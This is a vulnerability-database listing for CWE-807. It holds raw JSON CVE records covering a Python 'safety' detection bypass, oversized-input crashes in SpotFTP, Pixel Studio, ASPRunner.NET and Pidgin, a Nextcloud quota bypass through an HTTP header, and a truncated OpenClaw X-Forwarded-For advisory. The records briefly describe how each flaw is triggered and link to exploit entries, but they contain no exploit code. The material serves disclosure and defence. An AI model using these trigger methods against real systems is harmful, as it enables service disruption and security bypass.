CWE-807
AllowedReliance on Untrusted Inputs in a Security Decision
Abstraction: Base · Status: Incomplete
The product uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism.
145 vulnerabilities reference this CWE, most recent first.
CVE-2020-5252 (GCVE-0-2020-5252)
Vulnerability from cvelistv5 – Published: 2020-03-23 23:05 – Updated: 2024-08-04 08:22- CWE-807 - Reliance on Untrusted Inputs in a Security Decision
| URL | Tags |
|---|---|
| https://github.com/pyupio/safety/security/advisor… | x_refsource_CONFIRM |
| https://pyup.io/posts/patched-vulnerability/ | x_refsource_CONFIRM |
| https://github.com/akoumjian/python-safety-vuln | x_refsource_CONFIRM |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T08:22:09.086Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/pyupio/safety/security/advisories/GHSA-7q25-qrjw-6fg2"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://pyup.io/posts/patched-vulnerability/"
},
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/akoumjian/python-safety-vuln"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "safety",
"vendor": "pyupio",
"versions": [
{
"status": "affected",
"version": "\u003c 1.9.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The command-line \"safety\" package for Python has a potential security issue. There are two Python characteristics that allow malicious code to \u201cpoison-pill\u201d command-line Safety package detection routines by disguising, or obfuscating, other malicious or non-secure packages. This vulnerability is considered to be of low severity because the attack makes use of an existing Python condition, not the Safety tool itself. This can happen if: You are running Safety in a Python environment that you don\u2019t trust. You are running Safety from the same Python environment where you have your dependencies installed. Dependency packages are being installed arbitrarily or without proper verification. Users can mitigate this issue by doing any of the following: Perform a static analysis by installing Docker and running the Safety Docker image: $ docker run --rm -it pyupio/safety check -r requirements.txt Run Safety against a static dependencies list, such as the requirements.txt file, in a separate, clean Python environment. Run Safety from a Continuous Integration pipeline. Use PyUp.io, which runs Safety in a controlled environment and checks Python for dependencies without any need to install them. Use PyUp\u0027s Online Requirements Checker."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:N",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-807",
"description": "CWE-807 Reliance on Untrusted Inputs in a Security Decision",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2020-03-23T23:05:16.000Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/pyupio/safety/security/advisories/GHSA-7q25-qrjw-6fg2"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://pyup.io/posts/patched-vulnerability/"
},
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/akoumjian/python-safety-vuln"
}
],
"source": {
"advisory": "GHSA-7q25-qrjw-6fg2",
"discovery": "UNKNOWN"
},
"title": "Malicious package may avoid detection in python auditing",
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2020-5252",
"STATE": "PUBLIC",
"TITLE": "Malicious package may avoid detection in python auditing"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "safety",
"version": {
"version_data": [
{
"version_value": "\u003c 1.9.0"
}
]
}
}
]
},
"vendor_name": "pyupio"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "The command-line \"safety\" package for Python has a potential security issue. There are two Python characteristics that allow malicious code to \u201cpoison-pill\u201d command-line Safety package detection routines by disguising, or obfuscating, other malicious or non-secure packages. This vulnerability is considered to be of low severity because the attack makes use of an existing Python condition, not the Safety tool itself. This can happen if: You are running Safety in a Python environment that you don\u2019t trust. You are running Safety from the same Python environment where you have your dependencies installed. Dependency packages are being installed arbitrarily or without proper verification. Users can mitigate this issue by doing any of the following: Perform a static analysis by installing Docker and running the Safety Docker image: $ docker run --rm -it pyupio/safety check -r requirements.txt Run Safety against a static dependencies list, such as the requirements.txt file, in a separate, clean Python environment. Run Safety from a Continuous Integration pipeline. Use PyUp.io, which runs Safety in a controlled environment and checks Python for dependencies without any need to install them. Use PyUp\u0027s Online Requirements Checker."
}
]
},
"impact": {
"cvss": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:N",
"version": "3.1"
}
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "CWE-807 Reliance on Untrusted Inputs in a Security Decision"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/pyupio/safety/security/advisories/GHSA-7q25-qrjw-6fg2",
"refsource": "CONFIRM",
"url": "https://github.com/pyupio/safety/security/advisories/GHSA-7q25-qrjw-6fg2"
},
{
"name": "https://pyup.io/posts/patched-vulnerability/",
"refsource": "CONFIRM",
"url": "https://pyup.io/posts/patched-vulnerability/"
},
{
"name": "https://github.com/akoumjian/python-safety-vuln",
"refsource": "CONFIRM",
"url": "https://github.com/akoumjian/python-safety-vuln"
}
]
},
"source": {
"advisory": "GHSA-7q25-qrjw-6fg2",
"discovery": "UNKNOWN"
}
}
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2020-5252",
"datePublished": "2020-03-23T23:05:16.000Z",
"dateReserved": "2020-01-02T00:00:00.000Z",
"dateUpdated": "2024-08-04T08:22:09.086Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2019-25711 (GCVE-0-2019-25711)
Vulnerability from cvelistv5 – Published: 2026-04-12 12:28 – Updated: 2026-04-13 15:13- CWE-807 - Reliance on Untrusted Inputs in a Security Decision
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/46088 | exploit |
| https://www.vulncheck.com/advisories/spotftp-pass… | third-party-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| NSauditor | SpotFTP Password Recover |
Affected:
2.4.2
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2019-25711",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-04-13T15:11:49.365062Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-04-13T15:13:03.838Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "SpotFTP Password Recover",
"vendor": "NSauditor",
"versions": [
{
"status": "affected",
"version": "2.4.2"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Luis Martinez"
}
],
"datePublic": "2019-01-07T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "SpotFTP Password Recover 2.4.2 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an oversized buffer in the Name field during registration. Attackers can generate a 256-byte payload, paste it into the Name input field, and trigger a crash when submitting the registration code."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "NONE",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-807",
"description": "Reliance on Untrusted Inputs in a Security Decision",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-12T12:28:55.601Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-46088",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/46088"
},
{
"name": "VulnCheck Advisory: SpotFTP Password Recover 2.4.2 Denial of Service via Name Field",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/spotftp-password-recover-denial-of-service-via-name-field"
}
],
"title": "SpotFTP Password Recover 2.4.2 Denial of Service via Name Field",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2019-25711",
"datePublished": "2026-04-12T12:28:55.601Z",
"dateReserved": "2026-04-12T12:19:23.786Z",
"dateUpdated": "2026-04-13T15:13:03.838Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2019-25621 (GCVE-0-2019-25621)
Vulnerability from cvelistv5 – Published: 2026-03-23 13:48 – Updated: 2026-03-25 14:11- CWE-807 - Reliance on Untrusted Inputs in a Security Decision
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/46127 | exploit |
| http://www.pixarra.com/ | product |
| http://www.pixarra.com/uploads/9/4/6/3/94635436/t… | product |
| https://www.vulncheck.com/advisories/pixel-studio… | third-party-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| Pixarra | Pixel Studio |
Affected:
2.17
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2019-25621",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-25T14:09:25.306905Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-25T14:11:29.043Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Pixel Studio",
"vendor": "Pixarra",
"versions": [
{
"status": "affected",
"version": "2.17"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Ihsan Sencan"
}
],
"datePublic": "2019-01-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Pixel Studio 2.17 contains a denial of service vulnerability that allows local attackers to crash the application by providing malformed input through the keyboard interface. Attackers can trigger the vulnerability by entering arbitrary characters, causing the application to become unresponsive or terminate abnormally."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-807",
"description": "Reliance on Untrusted Inputs in a Security Decision",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-23T13:48:37.331Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-46127",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/46127"
},
{
"name": "Official Product Homepage",
"tags": [
"product"
],
"url": "http://www.pixarra.com/"
},
{
"name": "Product Reference",
"tags": [
"product"
],
"url": "http://www.pixarra.com/uploads/9/4/6/3/94635436/tbpixelstudio_install.exe"
},
{
"name": "VulnCheck Advisory: Pixel Studio 2.17 Denial of Service via Malformed Input",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/pixel-studio-denial-of-service-via-malformed-input"
}
],
"title": "Pixel Studio 2.17 Denial of Service via Malformed Input",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2019-25621",
"datePublished": "2026-03-23T13:48:37.331Z",
"dateReserved": "2026-03-23T13:46:05.684Z",
"dateUpdated": "2026-03-25T14:11:29.043Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2019-25594 (GCVE-0-2019-25594)
Vulnerability from cvelistv5 – Published: 2026-03-22 13:38 – Updated: 2026-03-24 15:14- CWE-807 - Reliance on Untrusted Inputs in a Security Decision
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/46823 | exploit |
| https://xlinesoft.com/ | product |
| https://xlinesoft.com/asprunnernet/download.htm | product |
| https://www.vulncheck.com/advisories/asprunner-ne… | third-party-advisory |
| Vendor | Product | Version | |
|---|---|---|---|
| Xlinesoft | ASPRunner.NET |
Affected:
10.1
|
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2019-25594",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-24T14:01:15.355508Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-24T15:14:49.550Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "ASPRunner.NET",
"vendor": "Xlinesoft",
"versions": [
{
"status": "affected",
"version": "10.1"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:xlinesoft:phprunner:10.1:*:*:*:*:*:*:*",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Victor Mondrag\u00f3n"
}
],
"datePublic": "2019-05-09T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "ASPRunner.NET 10.1 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long string in the table name field. Attackers can input a buffer of 10000 characters in the table name parameter during database table creation to trigger an application crash."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-807",
"description": "Reliance on Untrusted Inputs in a Security Decision",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-22T13:38:31.897Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-46823",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/46823"
},
{
"name": "Official Product Homepage",
"tags": [
"product"
],
"url": "https://xlinesoft.com/"
},
{
"name": "Product Reference",
"tags": [
"product"
],
"url": "https://xlinesoft.com/asprunnernet/download.htm"
},
{
"name": "VulnCheck Advisory: ASPRunner.NET 10.1 Denial of Service via Table Name Field",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/asprunner-net-denial-of-service-via-table-name-field"
}
],
"title": "ASPRunner.NET 10.1 Denial of Service via Table Name Field",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2019-25594",
"datePublished": "2026-03-22T13:38:31.897Z",
"dateReserved": "2026-03-22T12:54:32.136Z",
"dateUpdated": "2026-03-24T15:14:49.550Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2019-25544 (GCVE-0-2019-25544)
Vulnerability from cvelistv5 – Published: 2026-03-21 12:46 – Updated: 2026-03-24 14:31- CWE-807 - Reliance on Untrusted Inputs in a Security Decision
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/46930 | exploit |
| https://pidgin.im/ | product |
| https://www.vulncheck.com/advisories/pidgin-denia… | third-party-advisory |
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2019-25544",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2026-03-24T14:30:55.803437Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2026-03-24T14:31:19.687Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Pidgin",
"vendor": "Pidgin",
"versions": [
{
"status": "affected",
"version": "2.13.0"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:pidgin:pidgin:2.14.9:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:pidgin:pidgin:2.14.0:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:pidgin:pidgin:2.14.1:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:pidgin:pidgin:2.14.2:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:pidgin:pidgin:2.14.3:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:pidgin:pidgin:2.14.4:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:pidgin:pidgin:2.14.5:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:pidgin:pidgin:2.14.6:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:pidgin:pidgin:2.14.7:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:pidgin:pidgin:2.14.8:*:*:*:*:*:*:*",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:pidgin:pidgin:2.14.10:*:*:*:*:*:*:*",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Alejandra S\u00e1nchez"
}
],
"datePublic": "2019-05-27T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Pidgin 2.13.0 contains a denial of service vulnerability that allows local attackers to crash the application by providing an excessively long username string during account creation. Attackers can input a buffer of 1000 characters in the username field and trigger a crash when joining a chat, causing the application to become unavailable."
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "LOCAL",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"exploitMaturity": "NOT_DEFINED",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "NONE",
"vulnIntegrityImpact": "NONE",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS"
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.2,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-807",
"description": "Reliance on Untrusted Inputs in a Security Decision",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-03-21T12:46:48.415Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"name": "ExploitDB-46930",
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/46930"
},
{
"name": "Official Product Homepage",
"tags": [
"product"
],
"url": "https://pidgin.im/"
},
{
"name": "VulnCheck Advisory: Pidgin 2.13.0 Denial of Service via Malformed Username",
"tags": [
"third-party-advisory"
],
"url": "https://www.vulncheck.com/advisories/pidgin-denial-of-service-via-malformed-username"
}
],
"title": "Pidgin 2.13.0 Denial of Service via Malformed Username",
"x_generator": {
"engine": "vulncheck"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2019-25544",
"datePublished": "2026-03-21T12:46:48.415Z",
"dateReserved": "2026-03-21T12:23:17.461Z",
"dateUpdated": "2026-03-24T14:31:19.687Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2017-0887 (GCVE-0-2017-0887)
Vulnerability from cvelistv5 – Published: 2017-04-05 20:00 – Updated: 2024-08-05 13:18- CWE-807 - Reliance on Untrusted Inputs in a Security Decision (CWE-807)
| URL | Tags |
|---|---|
| https://nextcloud.com/security/advisory/?id=nc-sa… | x_refsource_CONFIRM |
| https://hackerone.com/reports/173622 | x_refsource_MISC |
| Vendor | Product | Version | |
|---|---|---|---|
| Nextcloud | Nextcloud Server |
Affected:
All versions before 9.0.55 and 10.0.2
|
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T13:18:06.509Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://nextcloud.com/security/advisory/?id=nc-sa-2017-005"
},
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://hackerone.com/reports/173622"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Nextcloud Server",
"vendor": "Nextcloud",
"versions": [
{
"status": "affected",
"version": "All versions before 9.0.55 and 10.0.2"
}
]
}
],
"datePublic": "2017-02-05T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Nextcloud Server before 9.0.55 and 10.0.2 suffers from a bypass in the quota limitation. Due to not properly sanitizing values provided by the `OC-Total-Length` HTTP header an authenticated adversary may be able to exceed their configured user quota. Thus using more space than allowed by the administrator."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-807",
"description": "Reliance on Untrusted Inputs in a Security Decision (CWE-807)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-04-05T19:57:01.000Z",
"orgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1",
"shortName": "hackerone"
},
"references": [
{
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://nextcloud.com/security/advisory/?id=nc-sa-2017-005"
},
{
"tags": [
"x_refsource_MISC"
],
"url": "https://hackerone.com/reports/173622"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "support@hackerone.com",
"ID": "CVE-2017-0887",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Nextcloud Server",
"version": {
"version_data": [
{
"version_value": "All versions before 9.0.55 and 10.0.2"
}
]
}
}
]
},
"vendor_name": "Nextcloud"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Nextcloud Server before 9.0.55 and 10.0.2 suffers from a bypass in the quota limitation. Due to not properly sanitizing values provided by the `OC-Total-Length` HTTP header an authenticated adversary may be able to exceed their configured user quota. Thus using more space than allowed by the administrator."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "Reliance on Untrusted Inputs in a Security Decision (CWE-807)"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://nextcloud.com/security/advisory/?id=nc-sa-2017-005",
"refsource": "CONFIRM",
"url": "https://nextcloud.com/security/advisory/?id=nc-sa-2017-005"
},
{
"name": "https://hackerone.com/reports/173622",
"refsource": "MISC",
"url": "https://hackerone.com/reports/173622"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "36234546-b8fa-4601-9d6f-f4e334aa8ea1",
"assignerShortName": "hackerone",
"cveId": "CVE-2017-0887",
"datePublished": "2017-04-05T20:00:00.000Z",
"dateReserved": "2016-11-30T00:00:00.000Z",
"dateUpdated": "2024-08-05T13:18:06.509Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
GHSA-2RGF-HM63-5QPH
Vulnerability from github – Published: 2026-03-03 22:17 – Updated: 2026-03-25 18:47Summary
OpenClaw used left-most X-Forwarded-For values when requests came from configured trusted proxies. In proxy chains that append/preserve header values, this could let attacker-controlled header content influence security decisions tied to client IP.
Affected Packages / Versions
- Package:
openclaw(npm) - Affected:
<= 2026.2.19-2 - Patched:
2026.2.21(planned next release)
Impact
